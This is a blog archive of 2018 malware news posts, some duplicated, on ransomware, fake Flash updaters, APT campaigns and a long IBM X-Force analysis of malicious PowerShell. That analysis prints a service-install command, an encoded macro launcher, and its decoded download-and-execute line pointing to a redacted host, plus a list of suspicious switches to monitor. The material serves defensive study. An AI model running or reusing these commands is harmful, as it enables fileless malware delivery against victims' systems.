Category Archives: Malware

A crippling ransomware attack hit a water utility in the aftermath of Hurricane Florence

A water utility in the US state of North Carolina suffered a severe ransomware attack in the week after Hurricane Florence hit the East Coast of the U.S.

According to the Onslow Water and Sewer Authority (aka ONWASA) some internal systems were infected with the Emotet malware, but the regular water service was not impacted.

According to ONWASA, the infections would require several of the main databases to be completely recreated, fortunately, no customer information was compromised.

“We are in the middle of another disaster following Hurricane Florence and tropical storm Michael,” CEO Jeff Hudson said employees in a video posted on Facebook,

“With a very sophisticated attack they penetrated our defenses, just as they penetrated the city of Atlanta and Mecklenburg county.”

hurricane florence

ONWASA CEO Jeffrey Hudson confirmed the ransomware attack began on October 4, the IT staff initially thought to have locked out the threat, however, on October 13 the malware started dropping the Ryuk ransomware into the infected systems.

“An ONWASA IT staff member was working was working at 3am and saw the attack,” ONWASA said.

“IT staff took immediate action to protect system resources by disconecting ONWASA from the internet, but the crypto-virus spread quickly along the network encrypting databases and files.”

Operators at the utility did not pay the ransom and opted out to recreate the infected systems.

“Ransom monies would be used to fund criminal, and perhaps terrorist activities in other countries,” ONWASA reasoned. “Furthermore, there is no expectation that payment of a ransom would forestall repeat attacks.”

The incident response had a significant impact on the operations of the utility in a critical moment, the aftermath of the Hurricane Florence.

ONWASA estimates it will take several weeks to rebuild all of the damaged systems, it will not possible for customers to pay the bill online and major delays will affect the service provided by the utility.

The effects of the Hurricane Florence on the Onslow county were important, schools are still closed and local authorities are still working to clean up debris from the massive storm. It has been estimated that costs to restore the ordinary situation will hit $125m.

Pierluigi Paganini

(Security Affairs – Hurricane Florence, ransomware)

The post A crippling ransomware attack hit a water utility in the aftermath of Hurricane Florence appeared first on Security Affairs.

KeyBoy Attacker Group Uses Publicly Available Exploit Code to Deliver Malware

The KeyBoy attacker group is using publicly available exploit code for two Microsoft security flaws to infect vulnerable machines with malware.

Researchers at AlienVault recently observed a new campaign launched by the KeyBoy attacker group, which has been active since at least 2013. In this latest operation, the group sent a phishing email to India’s ambassador to Ethiopia from an email address at nic.in, India’s National Informatics Centre.

The email arrived with an attachment that executed a script containing the public exploit code for CVE-2017-0199, a Microsoft vulnerability that allows attackers to execute arbitrary code using a crafted document. Other documents contained an exploit generator for CVE-2017-8570, which bypasses Microsoft’s patch for CVE-2017-0199.

Exploiting Known Vulnerabilities to Install TSSL and Titan Malware

Upon launching the exploit code, the script downloaded malware known as TSSL. Citizen Lab observed variants of TSSL that came with the FakeRun loader and the TClient backdoor, which allowed the attacker group to download additional threats and maintain a presence on an infected system.

AlienVault also detected KeyBoy’s ongoing distribution of Titan, Android malware that is capable of collecting an infected user’s data and performing instructions as a superuser, according to researchers at Lookout.

These KeyBoy attacks weren’t the first to involve exploit code for CVE-2017-0199 and CVE-2017-8570. FireEye observed attackers abusing CVE-2017-0199 with malicious Microsoft Office RTF documents in April 2017, and Trend Micro detected campaigns exploiting that same flaw via PowerPoint slideshows several months later. In April 2018, Zscaler identified a campaign that leveraged exploit code for CVE-2017-8570 to distribute LokiBot.

The Key to Stopping KeyBoy Attacks

Organizations can protect themselves against KeyBoy’s campaigns and similar operations by practicing intelligent vulnerability management. This approach requires organizations to create an effective vulnerability assessment process and use it to evaluate flaws based on their level of risk. Instead of patching everything as quickly as possible, organizations can use these vulnerability assessments to determine the order in which bugs should be patched.

Sources: AlienVault, Citizen Lab, Lookout, FireEye, Trend Micro, Zscaler

The post KeyBoy Attacker Group Uses Publicly Available Exploit Code to Deliver Malware appeared first on Security Intelligence.

Cryptomining attacks against Apple devices increase sharply

Check Point has published its latest Global Threat Index for September 2018, revealing a near-400% increase in cryptomining malware attacks against Apple iPhones. These attacks are using the Coinhive mining malware, which continues to occupy the top position in the Index that it has held since December 2017. Coinhive now impacts 19% of organizations worldwide. Check Point’s researchers also observed a significant increase in Coinhive attacks against PCs and devices using the Safari browser, which … More

The post Cryptomining attacks against Apple devices increase sharply appeared first on Help Net Security.

A week in security (October 8 – 14)

Last week, we warned you away from some dubious Doctor Who streams, explained how Endpoint Detection and Response may not be enough, and explored what happens during a confusing supply chain story. We also showed you how to keep up with security, explained the risks of fake browser updates, and explored the unpleasant world of workplace violence.

Other cybersecurity news:

Stay safe, everyone!

The post A week in security (October 8 – 14) appeared first on Malwarebytes Labs.

Malicious Platform Independent Trojan GPlayed Disguised as Google Play Store

By Waqas

Newly discovered Trojan malware, which has been dubbed as GPlayed by the IT security experts at Cisco Talos, disguises itself as Google Play Store to trick users into downloading it. After getting installed, it steals location information and bank details from the device. Additionally, it is capable of transferring code between desktop and mobile platforms. […]

This is a post from HackRead.com Read the original post: Malicious Platform Independent Trojan GPlayed Disguised as Google Play Store

Fake Adobe update really *does* update Flash (while also installing cryptominer)

Online criminals are planting cryptomining code on victims' Windows computers, using the camouflage of an update to Adobe Flash Player.

The post Fake Adobe update really *does* update Flash (while also installing cryptominer) appeared first on The State of Security.

The State of Security: Fake Adobe update really *does* update Flash (while also installing cryptominer)

Online criminals are planting cryptomining code on victims' Windows computers, using the camouflage of an update to Adobe Flash Player.

The post Fake Adobe update really *does* update Flash (while also installing cryptominer) appeared first on The State of Security.



The State of Security

Russia-linked BlackEnergy backed new cyber attacks on Ukraine’s state bodies

The Security Service of Ukraine (SBU) uncovered a new targeted attack launched by BlackEnergy APT on the IT systems of Ukrainian government entities.

The Security Service of Ukraine (SBU) uncovered a new targeted attack on the information and telecommunication systems of Ukrainian government entities.
The SBU attributed the attack to the BlackEnergy Russia-linked APT group.

“The Security Service of Ukraine has received more evidence of the aggressive actions of Russian intelligence services against Ukraine in cyberspace using a controlled hacker group responsible for carrying out cyberattacks on Ukraine’s critical infrastructure facilities during 2015-2017, known as BlackEnergy and NotPetya,” reads the SBU’s press release.

BlackEnergy made the headlines as the responsible for the massive power outage that occurred in Ukraine in December 2015.

The BlackEnergy malware is a threat improved to target SCADA systems, some variants include the KillDisk component developed to wipe the disks and make systems inoperable.

According to the SBU, BlackEnergy hackers used new samples of malware in a recent series of attack. The new malicious code act as surveillance software, they implement surveillance capabilities and remote administration features.

SBU along with experts from a well-known antivirus company determined that the malware involved in the attack are updated versions of the Industroyer backdoor.

The specialists involved in the investigation helped the Ukraine SBU to attribute the attack and implement mitigations to protect the IT infrastructure of government agencies.

The malware used in the recent attacks borrows the code from the Industroyer as reported by the ukrinform.net. website

“They have a number of similar characteristics, in particular using similar code snippets, computing capabilities of infected systems, etc.” states the ukrinform.net.

Experts from the SBU also observed attackers using hacking tools that were used by the BlackEnergy hackers in previous attacks.

Pierluigi Paganini

(Security Affairs – Security Service of Ukraine, Russia-linked APT group)

The post Russia-linked BlackEnergy backed new cyber attacks on Ukraine’s state bodies appeared first on Security Affairs.

Security Affairs: Russia-linked BlackEnergy backed new cyber attacks on Ukraine’s state bodies

The Security Service of Ukraine (SBU) uncovered a new targeted attack launched by BlackEnergy APT on the IT systems of Ukrainian government entities.

The Security Service of Ukraine (SBU) uncovered a new targeted attack on the information and telecommunication systems of Ukrainian government entities.
The SBU attributed the attack to the BlackEnergy Russia-linked APT group.

“The Security Service of Ukraine has received more evidence of the aggressive actions of Russian intelligence services against Ukraine in cyberspace using a controlled hacker group responsible for carrying out cyberattacks on Ukraine’s critical infrastructure facilities during 2015-2017, known as BlackEnergy and NotPetya,” reads the SBU’s press release.

BlackEnergy made the headlines as the responsible for the massive power outage that occurred in Ukraine in December 2015.

The BlackEnergy malware is a threat improved to target SCADA systems, some variants include the KillDisk component developed to wipe the disks and make systems inoperable.

According to the SBU, BlackEnergy hackers used new samples of malware in a recent series of attack. The new malicious code act as surveillance software, they implement surveillance capabilities and remote administration features.

SBU along with experts from a well-known antivirus company determined that the malware involved in the attack are updated versions of the Industroyer backdoor.

The specialists involved in the investigation helped the Ukraine SBU to attribute the attack and implement mitigations to protect the IT infrastructure of government agencies.

The malware used in the recent attacks borrows the code from the Industroyer as reported by the ukrinform.net. website

“They have a number of similar characteristics, in particular using similar code snippets, computing capabilities of infected systems, etc.” states the ukrinform.net.

Experts from the SBU also observed attackers using hacking tools that were used by the BlackEnergy hackers in previous attacks.

Pierluigi Paganini

(Security Affairs – Security Service of Ukraine, Russia-linked APT group)

The post Russia-linked BlackEnergy backed new cyber attacks on Ukraine’s state bodies appeared first on Security Affairs.



Security Affairs

Fake Flash updaters deliver cryptominers AND update Flash

Cryptominers have dethroned ransomware as the top malware threat and cybercriminals are coming up with new ways to keep the mining activity secret from the victims. One of these includes tricking users into unknowingly downloading and running the mining software via a fake Adobe Flash updater. To keep up appearances, the fake updater uses pop-up notifications from the official Adobe installer. The campaign At the start of August, Palo Alto Networks researchers have noticed Windows … More

The post Fake Flash updaters deliver cryptominers AND update Flash appeared first on Help Net Security.

Fake Adobe updates installing cryptomining malware while updating Flash

By Waqas

The IT security researchers at Palo Alto Networks has identified that a fake Flash updater is circulating the web and fooling computer users by sneakily installing cryptocurrency mining bot XMRig. In the past few months, researchers have identified 113 fake updaters installing cryptomining malware on targeted devices. The notorious updater is actively attacking computers since August […]

This is a post from HackRead.com Read the original post: Fake Adobe updates installing cryptomining malware while updating Flash

Smarter Clicks: 5 Tips to Help Your Family Avoid Risky Cyber Search Traps

smart search habitsSearching the internet has become as much a part of daily life as pouring that first cup of coffee each morning. We rely on it, we expect it to deliver, and often, we do it without much thought. McAfee’s annual Most Dangerous Celebrity list gives us a chance to hit pause on our habits and think about smart search habits.

MDC: Ruby Rose

This year, it’s “Orange is the New Black” and “Batwoman” actress Ruby Rose, who gets to don the digital crown of Most Dangerous Celebrity. That means cyber crooks and hackers are on to the public’s love of Ruby Rose and are exploiting those innocent searches for news, photos, and videos on this top actor. Other top dangerous searches include the list on the right graphic. (Sitcom and television actors — Kristin Cavallari, Debra Messing, Kourtney Kardashian — surprisingly outranked musicians this year by the way, so the click trend is weighted toward TV fans; if you are one, beware)!

This MDC reveal, coupled with October’s National Cyber Security Awareness Month (NCSAM) is a perfect time to sit down with your family and discuss safe clicking practices.

Smart Clicking

  1. smart search habitsBeware of third party movie/music downloads. Some kids (and adults) search the internet for bootleg movies and music to download. Talk to your kids about this unsafe (and illegal) practice and the consequences of doing this. The safest thing to do? Advise your kids to wait for the official release instead of visiting a third-party website that could contain malware. This also applies to MP3 music searches. If you search the phrase “free MP3” results would include some risky websites, so be aware of this cyber trap and search carefully. If a site looks suspect, keep moving. Teach kids that very few things that are legitimate are also free online.
  2. Update ASAP to stay safe! When you get a notification to update your phone, tablet, or PC, do it right away to make sure you have the latest, most secure version — which includes security updates and bug fixes — of your software. Updating timely is a critical way to block hackers and stop malware.smart search habits
  3. Examine links. We aren’t about to stop searching right? So, the solution is to search smarter.Like it or not, we’ve got to become security pros to some degree. Teach your family members to slow down and examine sites in order to spot sketchy third-party links. Look for flaws. Refuse to click on that third-party link that could get you in trouble — it’s simply not worth it!
  4. Protect devices. We are going to search; not much can stop that. So, search with an extra layer of security protection such as McAfee Total Protection. This comprehensive security solution keeps your family devices protected against malware, phishing attacks, and other threats. It includes McAfee WebAdvisor which can stop your kids from going to malicious websites.
  5. Think about parental control software. Kids are big fans of whomever and whatever is on trend and love to search, scroll, and consume information on celebrities. Helping kids balance online time with daily responsibilities and relationships can take up a big chunk of our time as parents. Consider setting limits on screen time and use software that filters inappropriate content and protects against malicious sites.

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her onTwitter @McAfee_Family. (Disclosures)

The post Smarter Clicks: 5 Tips to Help Your Family Avoid Risky Cyber Search Traps appeared first on McAfee Blogs.

Security Affairs: Experts warn of fake Adobe Flash update hiding a miner that works as a legitimate update

Security experts from Palo Alto Networks warn of fake Adobe Flash update hiding a miner that works as legitimate update and really update the software.

A fake Adobe Flash update actually was used as a vector for a malicious cryptocurrency miner, the novelty in this last campaign is represented by the tricks used by attackers to stealthily drop the malware.

The fake Adobe Flash update has been actively used in a campaign since this summer, it borrows the code from the legitimate update and also updates victims’ software, but it also includes the code to download an XMRig cryptocurrency miner on Windows systems.

“However, a recent type of fake Flash update has implemented additional deception. As early as August 2018, some samples impersonating Flash updates have borrowed pop-up notifications from the official Adobe installer.” reads the analysis published by Palo Alto Networks.

“These fake Flash updates install unwanted programs like an XMRig cryptocurrency miner, but this malware can also update a victim’s Flash Player to the latest version.”

fake Adobe Flash update

 

The fake Adobe Flash updates use file names starting with AdobeFlashPlayer that are hosted on cloud-based web servers that don’t belong to Adobe.

The downloads always include the string “flashplayer_down.php?clickid=” in the URL.

At the time of the report, it is still unclear the way attackers were spreading the URLs delivering the fake Adobe Flash update.

The domain is associated with other updaters or installers pushing cryptocurrency miners and other unwanted software

Network traffic analysis revealed the infected Windows hosts connect to [osdsoft[.]com] via HTTP POST request. This domain was associated with updaters or installers pushing cryptocurrency miners.

“This domain is associated with updaters or installers pushing cryptocurrency miners and other unwanted software. One such example from December 2017 named free-mod-menu-download-ps3.exe also shows osdsoft[.]com followed by XMRig traffic on TCP port 14444 like the example used in this blog.” continues the report.

“However, other malware samples reveal osdsoft[.]com is associated with other unwanted programs usually classified as malware.”

PaloAlto Networks experts highlighted that potential victims will still receive warning messages about running downloaded files on their Windows computer.

“This campaign uses legitimate activity to hide distribution of cryptocurrency miners and other unwanted programs,” concludes the analysis.

 “Organizations with decent web filtering and educated users have a much lower risk of infection by these fake updates.

Pierluigi Paganini

(Security Affairs – fake Adobe Flash update, hacking)

The post Experts warn of fake Adobe Flash update hiding a miner that works as a legitimate update appeared first on Security Affairs.



Security Affairs

Experts warn of fake Adobe Flash update hiding a miner that works as a legitimate update

Security experts from Palo Alto Networks warn of fake Adobe Flash update hiding a miner that works as legitimate update and really update the software.

A fake Adobe Flash update actually was used as a vector for a malicious cryptocurrency miner, the novelty in this last campaign is represented by the tricks used by attackers to stealthily drop the malware.

The fake Adobe Flash update has been actively used in a campaign since this summer, it borrows the code from the legitimate update and also updates victims’ software, but it also includes the code to download an XMRig cryptocurrency miner on Windows systems.

“However, a recent type of fake Flash update has implemented additional deception. As early as August 2018, some samples impersonating Flash updates have borrowed pop-up notifications from the official Adobe installer.” reads the analysis published by Palo Alto Networks.

“These fake Flash updates install unwanted programs like an XMRig cryptocurrency miner, but this malware can also update a victim’s Flash Player to the latest version.”

fake Adobe Flash update

 

The fake Adobe Flash updates use file names starting with AdobeFlashPlayer that are hosted on cloud-based web servers that don’t belong to Adobe.

The downloads always include the string “flashplayer_down.php?clickid=” in the URL.

At the time of the report, it is still unclear the way attackers were spreading the URLs delivering the fake Adobe Flash update.

The domain is associated with other updaters or installers pushing cryptocurrency miners and other unwanted software

Network traffic analysis revealed the infected Windows hosts connect to [osdsoft[.]com] via HTTP POST request. This domain was associated with updaters or installers pushing cryptocurrency miners.

“This domain is associated with updaters or installers pushing cryptocurrency miners and other unwanted software. One such example from December 2017 named free-mod-menu-download-ps3.exe also shows osdsoft[.]com followed by XMRig traffic on TCP port 14444 like the example used in this blog.” continues the report.

“However, other malware samples reveal osdsoft[.]com is associated with other unwanted programs usually classified as malware.”

PaloAlto Networks experts highlighted that potential victims will still receive warning messages about running downloaded files on their Windows computer.

“This campaign uses legitimate activity to hide distribution of cryptocurrency miners and other unwanted programs,” concludes the analysis.

 “Organizations with decent web filtering and educated users have a much lower risk of infection by these fake updates.

Pierluigi Paganini

(Security Affairs – fake Adobe Flash update, hacking)

The post Experts warn of fake Adobe Flash update hiding a miner that works as a legitimate update appeared first on Security Affairs.

Fake Flash updates upgrade software, but install crypto-mining malware

According to cybersecurity firm Palo Alto Networks, it discovered a fake Flash updater that has been duping conscientious computer users since August. The fake updater installs files to sneak a cryptocurrency mining bot called XMRig, which mines for Monero.

But here's the catch, while the fake updater is installing the XMRig malware, it's also updating the user's Flash.

Via: The Next Web

Source: Palo Alto Networks

iTranslator Malware Installs Two Drivers to Perform a MitM Attack

Researchers uncovered a malware sample called iTranslator that installs two drivers onto an infected machine to perform a man-in-the-middle (MitM) attack.

According to FortiGuard Labs, the malware sample, called itranslator_02.exe, is signed by a digital certificate that expired back in 2015.

This instance starts off by creating a folder called “itranslator” in the program-data folder and extracting a file named wintrans.exe into that folder. The file initializes by installing iTranslatorSvc, a driver that enables the malware to load at system startup. Next, wintrans.exe installs another driver called “iNetfilterSvc” before downloading “iTranslator.dll.”

This dynamic link library (DLL) acts as the main malware module. It installs a secure sockets layer (SSL) certificate into web browsers as trusted root certificates without the victim’s permission, communicates with the two drivers iNetfilterSvc and iTranslatorSvc, and monitors the internet access packets from a victim’s web browsers. These functions support iTranslator’s performance of a MitM attack on a compromised system, thereby empowering the attackers to steal sensitive information.

What Are the Elements of a MitM Attack?

As noted by Incapsula, a successful MitM attack consists of two elements: the interception of user traffic before it reaches its destination and the decryption of SSL traffic without alerting the user. Bad actors have several methods, such as IP spoofing and SSL hijacking, that allow them to fulfill both of these stages.

Online criminals are also embedding these tactics into different kinds of threats. Kaspersky Lab researchers noted that they discovered MitM capabilities in malicious Google Chrome extensions. According to Cisco Talos, meanwhile, the advanced Internet of Things (IoT) botnet malware VPNFilter also had a module for conducting MitM attacks.

How to Protect Against Malware Like iTranslator

For computers infected with iTranslator, FortiGuard Labs advised security professionals to delete the files and folders created by the malware. In general, organizations can defend themselves against MitM attacks by implementing a layered defense strategy that combines traditional, file-based security with machine learning, threat detection sandboxing and next-generation endpoint protection.

Sources: FortiGuard Labs, Incapsula, Securelist, Cisco Talos

The post iTranslator Malware Installs Two Drivers to Perform a MitM Attack appeared first on Security Intelligence.

An Increase in PowerShell Attacks: Observations From IBM X-Force IRIS

Do you remember the era before GPS navigation devices? When getting somewhere unfamiliar involved receiving and remembering verbal directions, or — in the higher-tech ’90s — printing out a list of directions and a map to take on the trip? The ease and convenience of GPS devices has made these older methods all but obsolete. For many, there is no going back.

Such is the pathway of PowerShell, a Microsoft framework that is both a scripting language and a command line executor, useful for simplifying network administration and automating mundane tasks such as pushing updates to multiple devices. PowerShell first appeared in 2006 and has been a standard feature of the Windows operating system (OS) since Windows 7. Moreover, PowerShell 6.0 was released under the Massachusetts Institute of Technology (MIT) open source license in 2016 in an effort to encourage cross-platform adoption and increase usage.

PowerShell is a versatile tool that can execute code from memory and provide entry directly to a device’s core. That includes unbounded access to Windows application programming interfaces (APIs), full access to the Windows Management Instrumentation (WMI) and access to the .NET Framework.

Despite its multiple benefits, PowerShell — like GPS systems — can be used by threat actors. IBM X-Force Incident Response and Intelligence Services (IRIS) identified an upward trend in malicious PowerShell use — most likely due to the open-source nature of the tool, and because malicious actors have realized they can use the tool to inject malware directly into memory, enhance obfuscation and evade antivirus detection software. Our observations provide additional insight to this evolving trend, and highlight unique aspects of PowerShell use by threat actors, such as PowerShell scripts installed as services.

Windows PowerShell

PowerShell Attacks Are Trending Upward

Multiple security analysts have noted a significant increase in malicious PowerShell use after PowerShell 6.0 became open source in 2016. A McAfee Labs report found that PowerShell malware increased by 432 percent between 2016 and 2017, and Symantec noted a 661 percent increase in the number of computers where PowerShell activity was blocked from mid-2017 to mid-2018.

IBM X-Force data similarly revealed that PowerShell attacks have been growing over the past 12 months. Furthermore, data from our Managed Security Services (MSS) identified a distinct increase in the use of malicious PowerShell in April, August and September 2018 (Figure 1).

Figure 1: PowerShell attacks using obfuscation and suspicious downloaders

Figure 1: PowerShell attacks using obfuscation and suspicious downloaders, March-September 2018

While our data indicated that obfuscated attacks trailed off in May and June 2018, they reappeared in late July 2018. In mid-September, we began to see a new attack type appear in our data: suspicious PowerShell downloader activity indicating that a remote attacker was attempting to use PowerShell to download malicious content and automatically trigger execution of the payload. This could allow malicious code to run and infect the target system.

More Power in the Shell?

The appeal of the PowerShell framework to an attacker is clear: execution directly from memory means that attacks can remain fileless and are thus stealthier than other types of attacks. PowerShell also provides remote access capabilities and can bypass application whitelisting. Moreover, threat actors can use PowerShell encoding options to enhance the obfuscation of malicious code, lending more stealth to illicit operations.

Yet just as shutting down the entire GPS satellite network would have more negative repercussions for legitimate users than would be worthwhile — and criminals would probably find a workaround anyway — the elimination of PowerShell would provide little resolution to the underlying problem of malicious cyber actors. Instead, security practitioners would do well to stay updated on how bad actors can use PowerShell and familiarize themselves with the tools available to detect and eradicate malevolent activities.

To that end, let’s take a look at some of the trends in malicious PowerShell use observed by X-Force IRIS — leading with the most unique — and explore some tips to help defenders detect and mitigate PowerShell attacks.

Trend 1: PowerShell Scripts Installed as Services

One of the more unique tactics we have observed in recent attacks on organizational networks is threat actors installing PowerShell scripts as services. Windows services are programs that run in the background and do not require frequent user interaction. As such, malicious actors can leverage these types of programs to install and run other programs while evading detection under the guise of a legitimate part of the operating system.

In most of the instances in which X-Force IRIS observed PowerShell scripts installed as services, the script contained a base64-encoded string. The string decodes to a Gzip-compressed PowerShell script, which is then launched. In the example below, the PowerShell script is run as a service and requires Non-Sucking Service Manager (NSSM) to operate. That component was initially installed as part of the malware payload. Once installed, the PowerShell script calls NSSM and launches the malicious service.

start-Process -FilePath .\nssm.exe -ArgumentList ‘install MaliciousService “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” “-command “& { . C:\Scripts\Monitor.ps1; Start-Monitoring }”” ‘ -NoNewWindow -Wait

Installing PowerShell scripts as services is not a common theme in security blogs and reports, suggesting this is a new or unique trend.

Trend 2: Propagation Through File Macros

Before exploiting PowerShell on a device, threat actors must first gain access to the device of interest. One common method that X-Force IRIS has observed is the use of phishing emails with productivity file attachments that contain malicious macros. Once activated, the malicious macros launch PowerShell, which then executes commands or scripts in the background and ultimately fetches and installs malicious code or malware. In some other cases, we have observed the use of internet query (IQY) file attachments in phishing attacks to initiate PowerShell and run malicious scripts.

According to periodic reports from anti-phishing organizations, phishing attacks continue to have a high rate of success. Subtle social engineering techniques, combined with well-researched messages and attachments that closely mimic those coming from legitimate organizations, continue to prove effective in deceiving even the most security-savvy recipients. Unsurprisingly, phishing emails remain the infection vector of choice for many skilled and unskilled attackers seeking to use PowerShell for malicious purposes.

Microsoft Word and Excel macros are likewise popular choices for malicious PowerShell use since they are routinely accepted as email attachments by many organizations. Activating code via macros on these file types can be stealthy, and this provides an avenue for dropping scripts that can evade various detection mechanisms.

X-Force IRIS regularly observes attackers using productivity file attachments purporting to be billing invoices, delivery notices or resumes to lure victims into opening them and enabling macros, which can end up infecting hosts and granting an attacker a foothold in the organization.

Trend 3: Injecting Malicious Code Into Memory

Threat actors often inject malware directly into memory using PowerShell, a tactic that IRIS has observed on multiple occasions. Using PowerShell as an injection method for malicious code or malware can eliminate intermediate steps and increase the malware’s stealth and agility.

Injecting malware directly into memory is one method that PowerShell users employ to bypass antivirus systems. As most antivirus software systems search for bad files written to disk, malicious actors may be able to evade malware scans by injecting directly into a computer’s random-access memory (RAM).

The destination process for the PowerShell injection varies depending on the attacker’s intention and skill. In many cases, attackers use PowerShell to inject malware into active, legitimate Windows processes, such as explorer.exe. To facilitate this process, threat actors occasionally drop their PowerShell scripts into temporary folders on the system. Once deployed, the malware injected directly into memory will have capabilities similar, if not identical, to malware written to disk: keylogging, data exfiltration and credential capture are just some of the operations that can then be commanded by a remote attacker.

In one example, the malware was capable of checking the environment before deployment to ensure it was not being run in a sandbox. It also scanned the network configuration for specific targets of interest, seeking out strings such as point-of-sale machines, healthcare-related words and access to financial websites, to name a few.

Trend 4: Base64-Encoded Scripts and Nested Obfuscation

Before digging into this next trend, please note that base64-encoded PowerShell is not an inherently malicious choice; it can be used for legitimate purposes, such as transferring binary files. However, encoding can be particularly helpful to an attacker because it allows obfuscation of the contents of malware that attackers may choose to deploy, thereby evading some malware detection mechanisms.

To begin, the presence of base64-encoded PowerShell scripts is often a telltale sign that malicious actors are using the framework. Legitimate users do not typically encode their scripts, but adversarial actors will often use encoding to obfuscate executable code that would otherwise get flagged by endpoint detection solutions.

For the past few months, X-Force IRIS has observed an increase in nested obfuscation when PowerShell is used maliciously. We have seen threat actors employ not only Base64-encoded scripts and commands, but also layers of obfuscation, sometimes including base64 encoding inside base64 encoding (double encoding) and then using Gzip compression, which adds an additional requirement to deflate. Other instances showed base64 encoding using a nonstandard alphabet to further obfuscate the script. These techniques make decoding harder for outsiders and raise a flag for defenders to further examine their intent.

In the following example, we provide information on a malicious Microsoft Excel document that contained Base64 obfuscation in order to evade detection, and how it was able to launch PowerShell to further its sinister endeavors.

Sample: 543D5E22DC9F8E57CA288E6C0EA281F3.xls

This is an Excel document containing multiple malicious Visual Basic for Applications (VBA) macros that provide instructions encoded in Base64. The delivery mechanism is a phishing email.

The file is opened in Microsoft Excel by the victim, and the program executes the malicious macros (some strings are purposely truncated).

WINWORD.EXE /n “C:\ 543D5E22DC9F8E57CA288E6C0EA281F3.xls “

Embedded macros execute PowerShell — let’s look at the script’s elements:

Base64-encoded command hidden in the Excel macro:

PowerShell.exe -Exec Bypass -NoL -Enc WwBuAGUAdAAuAHcAZQBiAHIAZQBxAHUAZQBzAHQAXQA6ADoAZABlAGYAYQB1AGwAdAB3AGUAYgBwAHIAbwB4AHkALgBjAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBuAGUAdAAuAGMAcgBlAGQAZQBuAHQAaQBhAGwAYwBhAGMAaABlAF0AOgA6AGQAZQBmAGEAdQBsAHQAYwByAGUAZABlAG4AdABpAGEAbABzADsAIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGU…

The -Exec Bypass switch allows PowerShell to run with elevated privileges to bypass the execution policy. The -NoL (NoLogo) switch hides the PowerShell copyright banner at startup. The -Enc (Encoded Command) switch tells PowerShell to expect base64-encoded parameters for execution.

These instructions cause the victim’s machine to download a malicious PowerShell script over an HTTP connection, which could then be executed as shown in the example below.

The decoded strings:

[net.webrequest]::defaultwebproxy.credentials = [net.credentialcache]::defaultcredentials; [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; IEX (New-Object Net.WebClient).DownloadString(‘https://xxxxxx.xx.com/login-prompt.ps1’)

PowerShell for Lateral Movement, Persistence and Injecting Malware

Fortunately, PowerShell use will not assist a malicious actor in all stages of an attack. Rather, it is primarily used to enable actions an attacker takes after initial compromise. Threat actors still need to use alternative tools for other stages of the attack, such as external reconnaissance, developing infrastructure, initial compromise and, often, to establish a foothold in the environment.

The recently launched “X-Force IRIS Cyberattack Preparation and Execution Frameworks” detail the steps most attackers take in identifying, researching, targeting and attacking a victim network.

Figure 2: X-Force IRIS Cyberattack Preparation and Execution Frameworks

Figure 2: X-Force IRIS Cyberattack Preparation and Execution Frameworks

Of the steps outlined above, X-Force IRIS has observed PowerShell used primarily to move laterally, establish a foothold, conduct reconnaissance and maintain persistence in attacks.

PowerShell provides many opportunities for lateral movement within a target environment. In addition, using its scripts maliciously can allow attackers to establish a foothold by installing backdoors and to maintain persistence by placing malware in scheduled tasks, or in fileless fashion, directly into memory. To that effect, X-Force IRIS recently observed that spear phishing email messages often provided the initial infection vector for attackers.

Traditional protection methods, such as physical security controls, anti-phishing software solutions, disabling macros and using banners to highlight messages coming from outside the company can assist in decreasing opportunities for attackers who rely on PowerShell to gain access to a networked device. Educating employees about the risks of opening file attachments and enabling macros in unsolicited emails can add another layer of security to reduce the chances of infection at the source.

Some Useful Tips for Defenders

With the accelerating use of PowerShell scripts, nested obfuscation and mechanisms to bypass application whitelisting, what can be done to mitigate risks? To keep enjoying the benefits of PowerShell and help lessen the risk of misuse, IRIS recommends logging, tracking and auditing PowerShell use in your networks and employing specific search tools to flag malicious behavior.

Below are some specific tips for logging and tracking potentially malicious PowerShell activity:

  • At a minimum, ensure that PowerShell v5 is installed on your system, which features enhanced logging capabilities, including script block logging capabilities. Favor the most recent version to ensure better security.
  • Turn on transcription logs to further enable PowerShell logs to capture a full command, even when it is obfuscated.
  • Monitor for typical commands that malicious actors often use to execute the PowerShell console, such as:
    • -ExecutionPolicy Bypass and its derivatives such as -Exec Bypass and -ep bypass;
    • -EncodedCommand and derivatives such as -enc;
    • -NonInteractive, -NoLogo and -NoProfile and their derivatives such as -NonI, -NoL, -nol and -NoP; and
    • -WindowStyle Hidden and its derivatives such as -w hidden, -window hidden and -win hidden.
  • Monitor for the following events:
    • Event ID 4688 — A new process has been created. In particular, when logging, aim to capture the command line parameters in 4688 events. This can assist in finding PowerShell commands being passed as arguments.
    • Event ID 7045 — A service was installed on the system.
    • Event ID 4697 — A service was installed on the system “Windows Event Logs View.”
  • Employ YARA rules to assist in detecting malicious PowerShell use.

Specialized software and preventive measures can help provide an additional layer of protection and eliminate some of the manual process involved in logging PowerShell use and identifying potentially malicious scripts. These include:

Finally, in cases where attackers have already caused damage to a system or have facilitated the theft of information, forensic experts can assist in detecting malicious PowerShell scripts and eradicating them from an organization’s infrastructure. To restore security levels, it is important to detect and eliminate any malware or malicious processes that were injected using the PowerShell framework.

By increasing employee awareness and calibrating security controls to detect malicious PowerShell activity, organizations can enjoy better protection against threats and the evolving nature of threat actors active in the wild.

The post An Increase in PowerShell Attacks: Observations From IBM X-Force IRIS appeared first on Security Intelligence.

Security Affairs: Exaramel Malware Links Industroyer ICS malware and NotPetya wiper

ESET researchers have spotted a new strain of malware tracked as Exaramel that links the dreaded not Petya wiper to the Industroyer ICS malware.

A few months ago, researchers from ESET discovered a new piece of malware that further demonstrates the existence of a link between Industroyer and the NotPetya wiper.

In June 2017, researchers at antivirus firm ESET discovered a new strain of malware, dubbed Industroyer, that was designed to target power grids.

Industroyer was involved in the December 2016 attack aimed at an electrical substation in Ukraine that caused significant power outages.

Industroyer is the fourth malware specifically designed to target ICS systems, threats previously discovered by security experts are StuxnetBlackEnergy, and Havex.

Now experts found a link between the 2016 Industroyer attack and Russia-linked APT groups tracked as BlackEnergy, TeleBots, Sandworm, and Electrum.

“That said, we have observed and documented ties between the BlackEnergy attacks – not only those against the Ukrainian power grid but against various sectors and high-value targets – and a series of campaigns (mostly) against the Ukrainian financial sector by the TeleBots group.” reads the analysis published by ESET.

